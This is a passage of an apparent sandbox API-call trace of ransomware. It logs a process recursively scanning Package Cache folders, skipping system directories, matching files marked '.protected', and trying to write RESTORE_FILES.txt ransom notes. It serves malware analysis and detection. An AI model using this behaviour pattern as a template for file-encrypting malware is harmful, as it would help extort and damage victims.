StrStrIW (lpFirst="vc_runtimeMinimum_x86.msi.protected", lpSrch=".protected") returned=".protected" [0093.338] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.339] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.339] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\RESTORE_FILES.txt") returned 134 [0093.339] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.339] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.339] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.339] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\RESTORE_FILES.txt") returned 113 [0093.339] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.340] FindNextFileW (in: hFindFile=0x47b9d0, 
lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.340] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.340] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.340] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.340] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.340] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.340] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\RESTORE_FILES.txt") returned 104 [0093.340] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.340] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.340] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.340] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.340] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\RESTORE_FILES.txt") returned 104 [0093.340] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.341] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.341] lstrcmpiW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", 
lpString2="Windows") returned -1 [0093.341] lstrcmpiW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="Program Files") returned -1 [0093.341] lstrcmpiW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="Program Files (x86)") returned -1 [0093.341] lstrcmpiW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="$Recycle.bin") returned 1 [0093.341] lstrcmpiW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="System Volume Information") returned -1 [0093.341] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}") returned 75 [0093.341] lstrcmpW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2=".") returned 1 [0093.341] lstrcmpW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="..") returned 1 [0093.341] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*") returned 77 [0093.341] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.341] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.341] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.341] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.341] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.341] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.341] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\.") returned 77 [0093.341] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.341] FindNextFileW (in: hFindFile=0x47b9d0, 
lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.341] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.341] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.341] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.341] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.341] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.341] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\..") returned 78 [0093.341] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.342] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.342] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.342] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Windows") returned -1 [0093.342] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files") returned 1 [0093.342] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="Program Files (x86)") returned 1 [0093.342] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="$Recycle.bin") returned 1 [0093.342] lstrcmpiW (lpString1="RESTORE_FILES.txt", lpString2="System Volume Information") returned -1 [0093.342] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\RESTORE_FILES.txt") returned 93 [0093.342] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.342] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.342] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.342] lstrcmpiW (lpString1="state.rsm.protected", lpString2="Windows") returned -1 [0093.342] lstrcmpiW 
(lpString1="state.rsm.protected", lpString2="Program Files") returned 1 [0093.342] lstrcmpiW (lpString1="state.rsm.protected", lpString2="Program Files (x86)") returned 1 [0093.342] lstrcmpiW (lpString1="state.rsm.protected", lpString2="$Recycle.bin") returned 1 [0093.342] lstrcmpiW (lpString1="state.rsm.protected", lpString2="System Volume Information") returned -1 [0093.342] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm.protected") returned 95 [0093.342] StrStrIW (lpFirst="state.rsm.protected", lpSrch=".protected") returned=".protected" [0093.342] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.342] lstrcmpiW (lpString1="vcredist_x86.exe.protected", lpString2="Windows") returned -1 [0093.342] lstrcmpiW (lpString1="vcredist_x86.exe.protected", lpString2="Program Files") returned 1 [0093.342] lstrcmpiW (lpString1="vcredist_x86.exe.protected", lpString2="Program Files (x86)") returned 1 [0093.342] lstrcmpiW (lpString1="vcredist_x86.exe.protected", lpString2="$Recycle.bin") returned 1 [0093.342] lstrcmpiW (lpString1="vcredist_x86.exe.protected", lpString2="System Volume Information") returned 1 [0093.342] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe.protected") returned 102 [0093.342] StrStrIW (lpFirst="vcredist_x86.exe.protected", lpSrch=".protected") returned=".protected" [0093.342] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.342] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.342] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package 
Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\RESTORE_FILES.txt") returned 93 [0093.342] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.342] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.342] lstrcmpiW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="Windows") returned -1 [0093.342] lstrcmpiW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="Program Files") returned -1 [0093.342] lstrcmpiW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="Program Files (x86)") returned -1 [0093.342] lstrcmpiW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="$Recycle.bin") returned 1 [0093.342] lstrcmpiW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="System Volume Information") returned -1 [0093.342] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030") returned 86 [0093.342] lstrcmpW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2=".") returned 1 [0093.342] lstrcmpW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="..") returned 1 [0093.343] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*") returned 88 [0093.343] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package 
Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.343] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.343] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.343] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.343] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.343] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.343] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\.") returned 88 [0093.343] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.343] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.343] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.343] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.343] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.343] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.343] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.343] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\..") returned 89 [0093.343] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.343] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.343] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.343] lstrcmpiW (lpString1="packages", lpString2="Windows") returned -1 [0093.343] lstrcmpiW (lpString1="packages", lpString2="Program Files") returned -1 [0093.343] lstrcmpiW (lpString1="packages", lpString2="Program Files (x86)") 
returned -1 [0093.343] lstrcmpiW (lpString1="packages", lpString2="$Recycle.bin") returned 1 [0093.343] lstrcmpiW (lpString1="packages", lpString2="System Volume Information") returned -1 [0093.343] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages") returned 95 [0093.343] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0093.343] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0093.344] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*") returned 97 [0093.344] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.344] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.344] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.344] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.344] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.344] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\.") returned 97 [0093.344] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.344] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.344] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\..") returned 98 [0093.344] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.344] lstrcmpW (lpString1="..", 
lpString2="..") returned 0 [0093.344] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.344] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\RESTORE_FILES.txt") returned 113 [0093.344] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.344] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.344] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.344] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64") returned 121 [0093.344] lstrcmpW (lpString1="vcRuntimeAdditional_amd64", lpString2=".") returned 1 [0093.344] lstrcmpW (lpString1="vcRuntimeAdditional_amd64", lpString2="..") returned 1 [0093.345] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*") returned 123 [0093.345] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.345] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\.") returned 123 [0093.345] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.345] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 
1 [0093.345] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\..") returned 124 [0093.345] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.345] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.345] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.345] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.protected") returned 140 [0093.345] StrStrIW (lpFirst="cab1.cab.protected", lpSrch=".protected") returned=".protected" [0093.345] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.345] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\RESTORE_FILES.txt") returned 139 [0093.345] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.345] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.345] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.345] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.protected") returned 160 [0093.345] StrStrIW (lpFirst="vc_runtimeAdditional_x64.msi.protected", lpSrch=".protected") returned=".protected" [0093.345] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: 
lpFindFileData=0x295ea40) returned 0 [0093.345] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.345] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\RESTORE_FILES.txt") returned 139 [0093.345] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.346] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.346] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.346] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\RESTORE_FILES.txt") returned 113 [0093.346] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.347] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.347] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\RESTORE_FILES.txt") returned 104 [0093.347] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.347] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.347] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.347] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.347] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\RESTORE_FILES.txt") returned 104 [0093.347] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.348] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.348] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}") returned 75 [0093.348] lstrcmpW (lpString1="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpString2=".") returned 1 [0093.348] lstrcmpW (lpString1="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpString2="..") returned 1 [0093.348] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*") returned 77 [0093.348] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package 
Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.348] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\.") returned 77 [0093.348] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.348] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.348] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\..") returned 78 [0093.348] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.348] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.348] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.348] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\RESTORE_FILES.txt") returned 93 [0093.349] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.349] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.349] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.349] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\state.rsm.protected") returned 95 [0093.349] StrStrIW (lpFirst="state.rsm.protected", lpSrch=".protected") returned=".protected" [0093.349] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.349] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package 
